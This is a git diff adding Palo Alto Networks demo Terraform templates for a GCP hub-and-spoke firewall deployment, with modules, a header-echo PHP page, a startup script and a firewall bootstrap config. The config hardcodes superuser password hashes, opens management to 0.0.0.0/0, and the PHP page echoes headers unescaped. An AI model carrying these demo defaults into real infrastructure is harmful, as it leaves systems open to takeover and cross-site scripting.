+
+variable "create_instance_group" {
+  type    = bool
+  default = false
+}
+
+variable "instance_group_names" {
+  type    = list(string)
+  default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+  type    = list(string)
+  default = []
+}
+
+variable "nic0_ip" {
+  type    = list(string)
+  default = [""]
+}
+
+variable "nic1_ip" {
+  type    = list(string)
+  default = [""]
+}
+
+variable "nic2_ip" {
+  type    = list(string)
+  default = [""]
+}
+
+variable "mgmt_interface_swap" {
+  default = ""
+}
+
+variable "nic0_public_ip" {
+  type    = bool
+  default = false
+}
+
+variable "nic1_public_ip" {
+  type    = bool
+  default = false
+}
+
+variable "nic2_public_ip" {
+  type    = bool
+  default = false
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
new file mode 100644
index 00000000..0c614e1d
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf
@@ -0,0 +1,27 @@
+resource "google_compute_network" "default" {
+  name                            = var.vpc
+  delete_default_routes_on_create = var.delete_default_route
+  auto_create_subnetworks         = false
+}
+
+resource "google_compute_subnetwork" "default" {
+  count         = length(var.subnets)
+  name          = element(var.subnets, count.index)
+  ip_cidr_range = element(var.cidrs, count.index)
+  region        = element(var.regions, count.index)
+  network       = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+  count         = length(var.allowed_sources) != 0 ? 1 : 0
+  name          = "${google_compute_network.default.name}-ingress"
+  network       = google_compute_network.default.self_link
+  direction     = "INGRESS"
+  source_ranges = var.allowed_sources
+
+  allow {
+    protocol = var.allowed_protocol
+    ports    = var.allowed_ports
+  }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
new file mode 100644
index 00000000..e92488eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf
@@ -0,0 +1,24 @@
+output "subnetwork_id" {
+  value = google_compute_subnetwork.default.*.id
+}
+
+output "subnetwork_name" {
+  value = google_compute_subnetwork.default.*.name
+}
+
+output "subnetwork_self_link" {
+  value = google_compute_subnetwork.default.*.self_link
+}
+
+output "vpc_name" {
+  value = google_compute_network.default.*.name
+}
+
+output "vpc_id" {
+  value = google_compute_network.default.*.id[0]
+}
+
+output "vpc_self_link" {
+  value = google_compute_network.default.*.self_link[0]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
new file mode 100644
index 00000000..faccda44
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf
@@ -0,0 +1,33 @@
+variable "vpc" {
+}
+
+variable "subnets" {
+  type = list(string)
+}
+
+variable "cidrs" {
+  type = list(string)
+}
+
+variable "regions" {
+  type = list(string)
+}
+
+variable "allowed_sources" {
+  type    = list(string)
+  default = []
+}
+
+variable "allowed_protocol" {
+  default = "all"
+}
+
+variable "allowed_ports" {
+  type    = list(string)
+  default = []
+}
+
+variable "delete_default_route" {
+  default = "false"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/outputs.tf b/gcp/adv_peering_4fw_2spoke/outputs.tf
new file mode 100644
index 00000000..e81fb61e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/outputs.tf
@@ -0,0 +1,30 @@
+#-----------------------------------------------------------------------------------------------
+# Outputs
+output "GLB-ADDR" {
+  value = "http://${module.glb.address}"
+}
+
+output "MGMT-FW1" {
+  value = "https://${module.fw_inbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW2" {
+  value = "https://${module.fw_inbound.nic1_public_ip[1]}"
+}
+
+output "MGMT-FW3" {
+  value = "https://${module.fw_outbound.nic1_public_ip[0]}"
+}
+
+output "MGMT-FW4" {
+  value = "https://${module.fw_outbound.nic1_public_ip[1]}"
+}
+
+output "SSH-TO-SPOKE1" {
+  value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
+output "SSH-TO-SPOKE2" {
+  value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}"
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/project.tf b/gcp/adv_peering_4fw_2spoke/project.tf
new file mode 100644
index 00000000..835af2dc
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/project.tf
@@ -0,0 +1,18 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+provider "google" {
+ # credentials = var.auth_file
+  project     = var.project_id
+  region      = var.region
+}
+
+provider "google-beta" {
+ # credentials = var.auth_file
+  project     = var.project_id
+  region      = var.region
+  version     = "> 2.13.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
new file mode 100644
index 00000000..94f78467
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/spokes.tf b/gcp/adv_peering_4fw_2spoke/spokes.tf
new file mode 100644
index 00000000..ce369362
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/spokes.tf
@@ -0,0 +1,112 @@
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC.
+module "vpc_spoke1" {
+  source               = "./modules/vpc/"
+  vpc                  = var.spoke1_vpc
+  subnets              = var.spoke1_subnets
+  cidrs                = var.spoke1_cidrs
+  regions              = [var.region]
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
+module "vm_spoke1" {
+  source = "./modules/vm/"
+  names  = var.spoke1_vms
+  zones = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  subnetworks           = [module.vpc_spoke1.subnetwork_self_link[0]]
+  machine_type          = "f1-micro"
+  image                 = "ubuntu-os-cloud/ubuntu-1604-lts"
+  create_instance_group = true
+  ssh_key               = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+  startup_script        = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+module "ilb_web" {
+  source            = "./modules/ilb/"
+  name              = var.spoke1_ilb
+  subnetworks       = [module.vpc_spoke1.subnetwork_self_link[0]]
+  all_ports         = false
+  ports             = ["80"]
+  health_check_port = "80"
+  ip_address        = var.spoke1_ilb_ip
+  backends = {
+    "0" = [
+      {
+        group    = module.vm_spoke1.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.vm_spoke1.instance_group[1]
+        failover = false
+      }
+    ]
+  }
+  providers = {
+    google = google-beta
+  }
+}
+
+resource "google_compute_network_peering" "trust_to_spoke1" {
+  name                 = "${var.trust_vpc}-to-${var.spoke1_vpc}"
+  provider             = google-beta
+  network              = module.vpc_trust.vpc_self_link
+  peer_network         = module.vpc_spoke1.vpc_self_link
+  export_custom_routes = true
+}
+
+resource "google_compute_network_peering" "spoke1_to_trust" {
+  name                 = "${var.spoke1_vpc}-to-${var.trust_vpc}"
+  provider             = google-beta
+  network              = module.vpc_spoke1.vpc_self_link
+  peer_network         = module.vpc_trust.vpc_self_link
+  import_custom_routes = true
+
+  depends_on = [google_compute_network_peering.trust_to_spoke1]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create spoke2 vpc with VM.  Create peer link with trust VPC.
+module "vpc_spoke2" {
+  source               = "./modules/vpc/"
+  vpc                  = var.spoke2_vpc
+  subnets              = var.spoke2_subnets
+  cidrs                = var.spoke2_cidrs
+  regions              = [var.region]
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
+module "vm_spoke2" {
+  source       = "./modules/vm/"
+  names        = var.spoke2_vms
+  zones        = [data.google_compute_zones.available.names[0]]
+  machine_type = "f1-micro"
+  image        = "ubuntu-os-cloud/ubuntu-1604-lts"
+  subnetworks  = [module.vpc_spoke2.subnetwork_self_link[0]]
+  ssh_key      = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : ""
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+  name                 = "${var.trust_vpc}-to-${var.spoke2_vpc}"
+  provider             = google-beta
+  network              = module.vpc_trust.vpc_self_link
+  peer_network         = module.vpc_spoke2.vpc_self_link
+  export_custom_routes = true
+
+  depends_on = [google_compute_network_peering.spoke1_to_trust]
+}
+
+resource "google_compute_network_peering" "spoke2_to_trust" {
+  name                 = "${var.spoke2_vpc}-to-${var.trust_vpc}"
+  provider             = google-beta
+  network              = module.vpc_spoke2.vpc_self_link
+  peer_network         = module.vpc_trust.vpc_self_link
+  import_custom_routes = true
+
+  depends_on = [google_compute_network_peering.trust_to_spoke2]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/terraform.tfvars b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
new file mode 100644
index 00000000..df20d345
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/terraform.tfvars
@@ -0,0 +1,44 @@
+#project_id      = ""
+#public_key_path = "~/.ssh/gcp-demo.pub"
+
+#fw_panos        = "byol-904"
+#fw_panos        = "bundle1-904" 
+#fw_panos        = "bundle2-904"
+
+
+#-------------------------------------------------------------------
+region            = "us-east4"
+
+mgmt_vpc          = "mgmt-vpc"
+mgmt_subnet       = ["mgmt"]
+mgmt_cidr         = ["192.168.0.0/24"]
+mgmt_sources      = ["0.0.0.0/0"]
+
+untrust_vpc       = "untrust-vpc"
+untrust_subnet    = ["untrust"]
+untrust_cidr      = ["192.168.1.0/24"]
+
+trust_vpc         = "trust-vpc"
+trust_subnet      = ["trust"]
+trust_cidr        = ["192.168.2.0/24"]
+
+spoke1_vpc        = "spoke1-vpc"
+spoke1_subnets    = ["spoke1-subnet1"]
+spoke1_cidrs      = ["10.10.1.0/24"]
+spoke1_vms        = ["spoke1-vm1", "spoke1-vm2"]
+spoke1_ilb        = "spoke1-ilb"
+spoke1_ilb_ip     = "10.10.1.100"
+
+spoke2_vpc        = "spoke2-vpc"
+spoke2_subnets    = ["spoke2-subnet1"]
+spoke2_cidrs      = ["10.10.2.0/24"]
+spoke2_vms        = ["spoke2-vm1"]
+spoke_user        = "demo"
+
+fw_names_inbound  = ["vmseries01", "vmseries02"]
+fw_names_outbound = ["vmseries03", "vmseries04"]
+fw_machine_type   = "n1-standard-4"
+
+glb_name          = "vmseries-glb"
+ilb_name          = "vmseries-ilb"
+
diff --git a/gcp/adv_peering_4fw_2spoke/variables.tf b/gcp/adv_peering_4fw_2spoke/variables.tf
new file mode 100644
index 00000000..780f0a40
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/variables.tf
@@ -0,0 +1,116 @@
+variable "project_id" {
+  description = "GCP Project ID"
+}
+
+# variable "auth_file" {
+#   description = "GCP Project auth file"
+# }
+
+variable "region" {
+}
+
+variable "fw_panos" {
+  description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable "fw_image" {
+  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable "fw_names_inbound" {
+  type = list(string)
+}
+
+variable "fw_names_outbound" {
+  type = list(string)
+}
+
+variable "fw_machine_type" {
+}
+
+variable "glb_name" {
+}
+
+variable "ilb_name" {
+}
+
+variable "mgmt_vpc" {
+}
+
+variable "mgmt_subnet" {
+  type = list(string)
+}
+
+variable "mgmt_cidr" {
+  type = list(string)
+}
+
+variable "untrust_vpc" {
+}
+
+variable "untrust_subnet" {
+  type = list(string)
+}
+
+variable "untrust_cidr" {
+  type = list(string)
+}
+
+variable "trust_vpc" {
+}
+
+variable "trust_subnet" {
+  type = list(string)
+}
+
+variable "trust_cidr" {
+  type = list(string)
+}
+
+variable "mgmt_sources" {
+  type = list(string)
+}
+
+variable "spoke1_vpc" {
+}
+
+variable "spoke1_subnets" {
+  type = list(string)
+}
+
+variable "spoke1_cidrs" {
+  type = list(string)
+}
+
+variable "spoke1_vms" {
+  type = list(string)
+}
+
+variable "spoke1_ilb" {
+}
+
+variable "spoke1_ilb_ip" {
+}
+
+variable "spoke2_vpc" {
+}
+
+variable "spoke2_subnets" {
+  type = list(string)
+}
+
+variable "spoke2_cidrs" {
+  type = list(string)
+}
+
+variable "spoke2_vms" {
+  type = list(string)
+}
+
+variable "spoke_user" {
+  description = "SSH user for spoke Linux VM"
+}
+
+variable "public_key_path" {
+  description = "Local path to public SSH key.  If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
diff --git a/gcp/gcp-ilbnh/README.md b/gcp/gcp-ilbnh/README.md
new file mode 100644
index 00000000..904ccc45
--- /dev/null
+++ b/gcp/gcp-ilbnh/README.md
@@ -0,0 +1,22 @@
+# gcp-ilbnh
+ILB as next hop in GCP\
+This repository is intended to be used in conjunction with the 2-spoke advanced peering demo template:
+
+https://github.com/wwce/terraform/tree/master/gcp/adv_peering_2fw_2spoke
+
+This template may be used simultaneouly with or subsequent to the advanced peering template and will create an additional pair of FW behind an internal load balancer that can be used for outbound loadbalancing of TCP (only) traffic to provide redundancy of outbound connectivity. 
+
+ILB as next hop is not currently GA. Consequently, routes will need to be modified post-deployment with the following gcloud CLI command:
+
+gcloud beta compute routes create default-ilbnh \\ \
+--network=trust-vpc \\ \
+--destination-range=0.0.0.0/0 \\ \
+--next-hop-ilb=ilbnh-all  \\ \
+--next-hop-ilb-region=\<GCP REGION\> \\ \
+--priority=99
+
+N.B. - This template was developed/tested using Terraform 0.11.
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
new file mode 100644
index 00000000..9f506a10
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/bootstrap.xml
@@ -0,0 +1,632 @@
+<?xml version="1.0"?>
+<config version="8.1.0" urldb="paloaltonetworks">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+          <loopback>
+            <units>
+              <entry name="loopback.1">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="100.64.0.1/32"/>
+                </ip>
+                <interface-management-profile>health-check</interface-management-profile>
+              </entry>
+            </units>
+          </loopback>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="health-check">
+              <http>no</http>
+              <ssh>yes</ssh>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+              <member>loopback.1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="health-check-35.191.0.0n16">
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>35.191.0.0/16</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="health-check-130.211.0.0n22">
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>130.211.0.0/22</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="peer1">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="peer2">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>10.10.2.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>PA-VM</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
